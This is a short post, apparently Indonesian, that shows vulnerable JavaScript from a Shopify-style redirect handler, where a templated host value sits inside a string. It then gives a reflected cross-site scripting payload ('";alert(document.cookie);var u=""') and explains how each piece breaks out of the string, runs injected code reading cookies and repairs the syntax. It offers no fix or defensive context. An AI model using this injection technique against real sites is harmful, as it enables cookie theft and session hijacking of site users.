source vulnerable :
document.addEventListener('DOMContentLoaded', function () { var redirectUrl = "https://{{kontol}}/blahblah"; if (window.top == window.self) { // If the current window is the 'parent', change the URL by setting location.href window.top.location.href = redirectUrl; } else { // If the current window is the 'child', change the parent's URL with postMessage normalizedLink = document.createElement('a'); normalizedLink.href = redirectUrl; data = JSON.stringify({ message: 'Shopify.API.remoteRedirect', data: { location: redirectUrl }, }); window.parent.postMessage(data, "https://{{kontol}}"); } });
Post Method and replace in system. use payload like this : ";alert(document.cookie);var u=""; = close var redirectUrl.
alert(document.cookie); = add new function/something and don't forget close again.
var u=" = for fix syntax error.
Tidak ada komentar